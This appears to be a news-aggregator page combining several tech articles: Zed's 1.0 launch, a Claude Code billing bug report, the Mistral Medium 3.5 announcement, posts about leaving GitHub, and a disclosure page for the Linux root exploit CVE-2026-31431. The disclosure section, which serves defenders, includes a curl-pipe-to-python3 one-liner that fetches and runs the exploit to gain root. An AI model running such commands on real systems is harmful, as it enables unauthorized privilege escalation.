10 interesting stories served every morning and every evening.
10 interesting stories served every morning and every evening.
April 29th, 2026
To create a fundamentally better editor, we had to invent a new approach to building desktop software. Our previous editor, Atom, was built as a fork of Chromium, spawning the Electron framework in the process. Electron eventually became the foundation of VS Code (which today seems to be forked into a new AI code editor every other week). Web technology offered an easy path to shipping flexible software, but it also imposed a ceiling. No matter how hard we worked, we couldn’t make Atom better than the platform it was built on.
So we started over. Instead of building Zed like a web page, we built it like a video game, organizing the entire application around feeding data to shaders running on the GPU. That meant writing our own UI framework, GPUI, from scratch in Rust.
Owning every layer of our stack lets us take Zed places that no one building on borrowed foundations can go, but we knew from the beginning that it wasn’t going to be an easy path. Thanks to years of hard work by our team and community, Zed is closer than ever to that ideal tool we set out to create. We’ve added a ton of capabilities while remaining true to our core ethos of craft and performance, and hundreds of thousands of developers now rely on Zed to ship software each day. That’s part of what gives us the confidence to declare version 1.0.
What 1.0 Means
Developers expect a modern editor to support dozens of languages and their ecosystems, endless variations and edge cases across every stack: Git integration, SSH remoting, a Debugger, and, yes, rainbow brackets. We’ve spent five years building that surface area across Mac, Windows, and Linux, exceeding a million lines of code.
Zed is also an AI-native editor. You can run multiple agents in parallel, and edit predictions suggest your next change at keystroke granularity and with the speed you’ve come to expect from Zed. The Agent Client Protocol opens Zed up to a growing number of the best agents out there, including Claude Agent, Codex, OpenCode, and more recently Cursor. We built AI into our editor’s foundation instead of bolting it on top.
We’re also launching Zed for Business. Companies have been asking us for a way to roll out Zed to their engineering teams, and very soon they can, with centralized billing, role-based access controls, and team management.
1.0 doesn’t mean “done”. It also doesn’t mean “perfect”. It means we’ve reached a tipping point where most developers can quickly feel at home in Zed. If you tried Zed a year or two ago and bounced because something was missing, 1.0 is our invitation to try again. Zed is more capable than it’s ever been, and still more performant.
Where We’re Going
Our vision hasn’t changed since we started: we’re building the most performant and collaborative coding environment. What’s changed is what collaboration means while creating software. It used to mean humans working together in real time. Now it means humans and AI agents, working in the same space, on the same code.
Building our own foundations is what got us to 1.0, and it’s also what makes the next chapter possible. We’re actively developing DeltaDB, a synchronization engine built on CRDTs that tracks every change with character-level granularity. DeltaDB lets multiple humans and agents share a single, consistent view of the codebase as it evolves. DeltaDB will allow you to invite teammates into conversations with agents to review and evolve agentic code directly in the context from which it’s generated.
This vision depends on deep ownership of our fundamental primitives. It’s not an experience we’d be able to ship inside of someone else’s browser engine.
A Milestone, Not a Finish Line
We’ve shipped over a thousand versions of Zed, but all of them began with zero. Today, that changes.
We’ll keep shipping every week, the way we always have. The list of things to build will never end, and that’s exactly how we like it. Each release moves the craft forward.
If you want to try Zed, download now. If you want to help us build it, join us!
Related Posts
Check out similar blogs from the Zed team.
Looking for a better editor?
You can try Zed today on macOS, Windows, or Linux. Download now!
We are hiring!
If you’re passionate about the topics we cover on our blog, please consider joining our team to help us ship the future of software development.
Summary
When a git repository’s recent commit history contains the case-sensitive string HERMES.md, Claude Code routes API requests to “extra usage” billing instead of the included Max plan quota. This silently burned through $200 in extra usage credits while my Max 20x plan capacity remained largely untouched (13% weekly usage).
Environment
Claude Code v2.1.119
macOS (Apple Silicon)
Max 20x plan ($200/month)
Model: claude-opus-4 – 6[1m] (also reproduces with claude-opus-4 – 7)
Reproduction
Minimal reproduction — no project files needed:
# This FAILS with “out of extra usage” (routes to extra usage billing)
mkdir /tmp/test-fail && cd /tmp/test-fail
git init && echo test > test.txt && git add . && git commit -m “add HERMES.md”
claude -p “say hello” –model “claude-opus-4 – 6[1m]”
# => API Error: 400 “You’re out of extra usage…”
# This WORKS (routes to plan quota)
mkdir /tmp/test-pass && cd /tmp/test-pass
git init && echo test > test.txt && git add . && git commit -m “add hermes.md”
claude -p “say hello” –model “claude-opus-4 – 6[1m]”
# => “Hello!”
# Cleanup
rm -rf /tmp/test-fail /tmp/test-pass
The trigger is the string HERMES.md in git commit messages — not the presence of a file with that name on disk. Claude Code includes recent commits in its system prompt, and something server-side routes the request differently when this string is present.
What triggers it vs. what doesn’t
Impact
$200.98 in extra usage credits consumed for requests that should have been covered by the included Max 20x plan quota
Multiple projects became completely unusable once extra usage was depleted, while the plan dashboard showed 86%+ remaining weekly capacity
The error message (“out of extra usage”) gives no indication that content-based routing is the cause, making this extremely difficult to diagnose
Any user with HERMES.md in recent git commits would silently have their usage billed to extra credits
Expected behavior
API request billing should not depend on the content of git commit messages in the system prompt. All requests from a Max plan subscriber should route to the included plan quota first.
How I found this
Systematic binary search: cloning affected repos, testing orphan branches, then isolating individual commit message strings until HERMES.md was identified as the exact trigger.
CVE-2026 – 31431
100% reliable
every distro since 2017
container escape primitive
732 bytes
found by Xint Code
Most Linux LPEs need a race window or a kernel-specific offset.Copy Fail is a straight-line logic flaw — it needs neither.The same 732-byte Python script roots every Linux distribution shipped since 2017.
One logic bug in authencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently exploitable for nearly a decade.
The demo
Same script, four distributions, four root shells — in one take. The same exploit binary works unmodified on every Linux distribution.
tmux — copy fail demo
live
Who is affected
If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you’re in scope.
Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro’s default config, so the entire 2017 → patch window is in play out of the box.
Distributions we directly verified:
These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add to the list.
Should you patch first?
High
Multi-tenant Linux hosts
Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel.
any user becomes root
High
Kubernetes / container clusters
The page cache is shared across the host. A pod with the right primitives compromises the node and crosses tenant boundaries.
cross-container, cross-tenant
High
CI runners & build farms
GitHub Actions self-hosted runners, GitLab runners, Jenkins agents — anything that executes untrusted PR code as a regular user, on a shared kernel.
a PR becomes root on the runner
High
Cloud SaaS running user code
Notebook hosts, agent sandboxes, serverless functions, any tenant-supplied container or script.
tenant becomes host root
Medium
Standard Linux servers
Single-tenant production where only your team has shell access.
internal LPE; chains with web RCE or stolen creds
Lower
Single-user laptops & workstations
You’re already the only user. The bug doesn’t grant remote attackers access by itself, but any local code execution becomes root.
post-exploitation step-up
Exploit
The PoC is published so defenders can verify their own systems and validate vendor patches.
Use responsibly. Run only on systems you own or have written authorization to test. The script edits the page cache of a setuid binary; the change is not persistent across reboot, but the resulting root shell is real. Don’t run it on production.
copy_fail_exp.py 732 B
Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib).Targets /usr/bin/su by default; pass another setuid binary as argv[1].
sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9
Quick run:
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026 – 31431
Mitigation
Patch first. Update your distribution’s kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.
Before you can patch: disable the algif_aead module.
# echo “install algif_aead /bin/false” > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true
What does this break? For the vast majority of systems — nothing measurable.
Will not affect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-kernel TLS, OpenSSL/GnuTLS/NSS default builds, SSH, kernel keyring crypto. These all use the in-kernel crypto API directly — they don’t go through AF_ALG.
May affect: userspace specifically configured to use AF_ALG — e.g. OpenSSL with the afalg engine explicitly enabled, some embedded crypto offload paths, or applications that bind aead/skcipher/hash sockets directly. Check with lsof | grep AF_ALG or ss -xa if in doubt.
Performance: AF_ALG is a userspace front door to the kernel crypto API. Disabling it does not slow anything that wasn’t already calling it; for the things that were, performance falls back to a normal userspace crypto library, which is what almost everything else already does.
For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.
FAQ
Loading FAQ…
Disclosure timeline
2026 – 03-23Reported to Linux kernel security team
2026 – 03-24Initial acknowledgment
2026 – 03-25Patches proposed and reviewed
2026 – 04-01Patch committed to mainline
2026 – 04-22CVE-2026 – 31431 assigned
2026 – 04-29Public disclosure (https://copy.fail/)
Xint Code
Is your software AI-era safe?
Copy Fail was surfaced by Xint Code about an hour of scan time against the Linux crypto/ subsystem. Full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up.
The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way — one operator prompt, no harnessing, prioritized findings with trigger and impact narratives.
Track record
0-day RCE
ZeroDay Cloud
Swept the database category — Redis, PostgreSQL, MariaDB. Zero human intervention.
Top 3
DARPA AIxCC
Finalist in the AI Cyber Challenge hosted by DoD DARPA.
9×
DEF CON CTF
Most-winning team in DEF CON CTF history.
JavaScript is not available. We’ve detected that JavaScript is disabled in this browser. Please enable JavaScript or switch to a supported browser to continue using x.com. You can see a list of supported browsers in our Help Center.
Something went wrong, but don’t fret — let’s give it another shot.
Some privacy related extensions may cause issues on x.com. Please disable them and try again.
git is decentralized, but what of the rest?
GitHub seems to be crumbling the past couple of weeks.
Whatever the reason, ultimately its not great for 90% of the
world’s OSS to depend on one provider. Centralized systems
always crumble; it’s the emails, gits, and IRCs that stand
the test of time. Tangled aims to fit in this space, allow
me to explain.
Code collaboration has always made use of two protocols, one
for code transfer and one for communication:
It began with the email flow: git (code transfer) + email
(comms)
Then there was GitHub: git (code transfer) + GitHub the
website (comms)
There is the ForgeFed project: git (code transfer) +
maybe
ActivityPub
(comms)
We are building Tangled: git (code transfer) + AT
protocol (comms)
Tangled federates events among git servers (called “knots”).
You can collaborate on repositories on any server and you
can fork across servers. You can even push to a repository
on your own server, and open a pull-request on a repo hosted
on a completely different server. In a lot of ways, this is
quite like hosting your own cgit instance, and sending out
patches via email.
Tangled uses AT to facilitate the Authenticated Transfer of
events surrounding code: like issues and pull-requests, and
it also enables a few social bits: a timeline of events,
follows, stars (and vouches very soon). AT is used to share
collaborator invites and ssh pubkeys, but the rest is just
good ol’ git.
OSS needs to break free from monocultures like GitHub, but
code collaboration should still be fun and social.
Coding agents have mostly lived on your laptop. Today we’re moving them to the cloud, where they run on their own, in parallel, and notify you when they’re done. You can start them from the Mistral Vibe CLI or directly in Le Chat, offloading a coding task without leaving the conversation.
Powering this is Mistral Medium 3.5 in public preview, our new default model in Mistral Vibe and Le Chat, built to run for long stretches on coding and productivity work. The new Work mode in Le Chat (Preview) extends this with a powerful agent for complex, multi-step tasks like research, analysis, and cross-tool actions.
Highlights.
Mistral Medium 3.5, a new flagship model that merges instruction-following, reasoning, and coding into a single 128B dense model. Released as open weights, under a modified MIT license.
Strong real-world performance at a size that runs self-hosted on as few as four GPUs.
Mistral Vibe remote agents for async coding: sessions run in the cloud, can be spawned from the CLI or Le Chat, and a local CLI session can be teleported up to the cloud.
Start Mistral Vibe coding tasks in Le Chat. Sessions run on the same remote runtime and keep going while you step away.
Work mode in Le Chat runs on a new agent, powered by Mistral Medium 3.5, that works through multi-step tasks, calling tools in parallel until the job is done.
Mistral Medium 3.5.
Mistral Medium 3.5 is our first flagship merged model, available in public preview. It is a dense 128B model with a 256k context window, handling instruction-following, reasoning, and coding in a single set of weights. It performs strongly in real-world use, with self-hosting possible on as few as four GPUs. Reasoning effort is now configurable per request, so the same model can answer a quick chat reply or work through a complex agentic run. We trained the vision encoder from scratch to handle variable image sizes and aspect ratios.
Mistral Medium 3.5 scores 77.6% on SWE-Bench Verified, ahead of Devstral 2 and models like Qwen3.5 397B A17B. It also has strong agentic capabilities and scores 91.4 on τ³-Telecom.
The model was built for long-horizon tasks, calling multiple tools reliably, and producing structured output that downstream code can consume. It is the model that made async cloud agents in Vibe practical to ship.
Mistral Medium 3.5 becomes the default model in Le Chat. It also replaces Devstral 2 in our coding agent, Vibe CLI.
Vibe remote agents.
From today, coding sessions can work through long tasks while you’re away. Many can run in parallel, and you stop being the bottleneck on every step the agent takes.
You can start the cloud agents from the Mistral Vibe CLI or from Le Chat. While they run, you can inspect what the agent is doing, with file diffs, tool calls, progress states, and questions surfaced as you go. Ongoing local CLI sessions can be teleported up to the cloud when you want to leave them running, with session history, task state, and approvals carrying across.
Vibe sits between the systems engineering teams already use, with humans in the loop wherever they’re needed. It plugs into GitHub for code and pull requests, Linear and Jira for issues, Sentry for incidents, and apps like Slack or Teams for reporting.
Each coding session runs in an isolated sandbox, including broad edits and installs. When the work is done, the agent can open a pull request on GitHub and notify you, so you review the result instead of every keystroke that produced it.
It fits the high-volume, well-defined work that takes a developer’s time without taking their judgment: module refactors, test generation, dependency upgrades, CI investigations, as well as bug fixes.
We use Workflows orchestrated in Mistral Studio to bring Mistral Vibe into Le Chat. We originally built this for our own in-house coding environment, then for our enterprise customers. Today the capability opens up to everyone, who can now launch coding tasks from the web. And without being tied to a local terminal, a developer can run several in parallel.
You can start coding sessions directly in Le Chat, so a task described in chat runs on the same remote runtime as the CLI and the web, and comes back later as a finished branch or a draft PR.
New Work mode in Le Chat (Preview).
Work mode is a powerful new agentic mode for complex tasks in Le Chat, powered by a new harness and Mistral Medium 3.5. The agent becomes the execution backend for the assistant itself, so Le Chat can read and write, use several tools at once, and work through multi-step projects until it completes what you’ve asked.
Here’s what Work mode enables you to do today.
Cross-tool workflows: catch up across email, messages, and calendar in a single run; prepare for a meeting with attendee context, latest news, and talking points pulled from your sources.
Research and synthesis: dive into a topic across the web, internal docs, and connected tools, then produce a structured brief or report you can edit before exporting or sending.
Triage your inbox and draft replies; create issues in Jira from your team and customer discussions; send a summary to your team on Slack.
Sessions persist longer than a typical chat reply, so an agent can keep going across many turns, through trial-and-error, and through to completion. In Work mode, connectors are on by default rather than chosen manually, which lets the agent reach into documents, mailboxes, calendars, and other systems for the rich context it needs to take correct action.
Every action the agent takes is visible: you see each tool call and the thinking rationale. Le Chat will ask for explicit approval—based on your permissions—before proceeding with sensitive tasks like sending a message, writing a document, or modifying data.
Get started.
Mistral Medium 3.5 is available today in Mistral Vibe and Le Chat, and powers remote coding agents and Work mode in Le Chat on the Pro, Team, and Enterprise plans.
Through API, it’s priced at $1.5 per million input tokens and $7.5 per million output tokens. Open weights are on Hugging Face under a modified MIT license.
It is also available for prototyping, hosted on NVIDIA GPU-accelerated endpoints on build.nvidia.com and as a scalable containerized inference microservice, NVIDIA NIM.
Build the future of agentic systems with us.
We’re hiring across research, engineering, and product to push agentic systems further. See our open roles.
Hashicorp co-founder Mitchell Hashimoto has decided GitHub is so unstable it is “no longer a place for serious work,” and will therefore move his current project elsewhere.
Hashimoto’s current labour of love is Ghostty, a terminal emulator that The Register has praised for its speed and for adding “some interesting new wrinkles” to a very mature category of software.
I want to ship software and it doesn’t want me to ship software
I want to ship software and it doesn’t want me to ship software
Like many developers, Hashimoto used GitHub to work on the project, and in a Tuesday post declared himself a fan.
“I’m GitHub user 1299, joined Feb 2008,” he wrote, and since then has used it almost every day.
“GitHub is the place that has made me the most happy,” he revealed, and “always made time for it” — even during his honeymoon because the service is “where I’ve historically been happiest and wanted to be.”
“Some people doom scroll social media. I’ve been doom scrolling GitHub issues since before that was a word,” he admitted. “On vacations I’d have bookmarks of different projects on GitHub I wanted to study. Not just source code, but OSS processes, how other maintainers react to difficult situations. Etc. Believe it or not, I like this.”
He’s liking GitHub a lot less these days.
“I’ve been angry about it. I’ve hurt people’s feelings. I’ve been lashing out. Because GitHub is failing me, every single day, and it is personal. It is irrationally personal,” he wrote.
The reason for his ire is the service has become unreliable.
“For the past month I’ve kept a journal where I put an ‘X’ next to every date where a GitHub outage has negatively impacted my ability to work,” he wrote. “Almost every day has an ‘X’. On the day I am writing this post, I’ve been unable to do any PR review for ~2 hours because there is a GitHub Actions outage.”
Hashimoto penned his post a few days before an April 28 incident that saw pull requests fail to complete due to an Elasticsearch SNAFU.
Incidents like that mean Hashimoto has decided GitHub “is no longer a place for serious work if it just blocks you out for hours per day, every day.”
“It’s not a fun place for me to be anymore,” he lamented. “I want to be there but it doesn’t want me to be there. I want to get work done and it doesn’t want me to get work done. I want to ship software and it doesn’t want me to ship software.”
The developer says he wants GitHub to improve, but “I also want to code. And I can’t code with GitHub anymore. I’m sorry. After 18 years, I’ve got to go.”
He’s open to a return if GitHub can deliver “real results and improvements, not words and promises.”
But for now, he’s working to move Ghostty to another collaborative code locker.
Microsoft’s GitHub shifts to metered AI billing amid cost crisis
Ongoing supply-chain attack ‘explicitly targeting’ security, dev tools
GitHub opts all CLI users into telemetry collection whether they want it or not
Microsoft’s GitHub grounds Copilot account sign-ups amid capacity crunch
“We have a plan but I’m also very much still in discussions with multiple providers (both commercial and FOSS),” Hashimoto wrote. “It’ll take us time to remove all of our dependencies on GitHub and we have a plan in place to do it as incrementally as possible.”
He’s doing the equivalent of leaving a toothbrush at a former partner’s house by leaving a read-only mirror of Ghostty on GitHub, and by keeping his personal projects on the Microsoft-owned service.
But Hashimoto’s moving his day job somewhere new.
“Ghostty is where I, our maintainers, and our open source community are most impacted so that is the focus of this change. We’ll see where it goes after that,” he concluded.
After Microsoft acquired GitHub, many feared the software giant would inevitably bend the service into a more Redmond-centric operation that made life less pleasant for developers who aren’t tied to Windows and/or Azure ecosystems. Those fears largely proved unfounded and the service entrenched itself as the de facto place to work on and share code.
Hashimoto’s experience suggests that status is in peril and comes at a time Microsoft has admitted Windows has serious quality problems, in part because it forcibly injected AI into too many tools. The increasing prevalence of GitHub wobbles Hashimoto observed also coincide with Microsoft’s AI obsession. Make of that what you will. ®
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.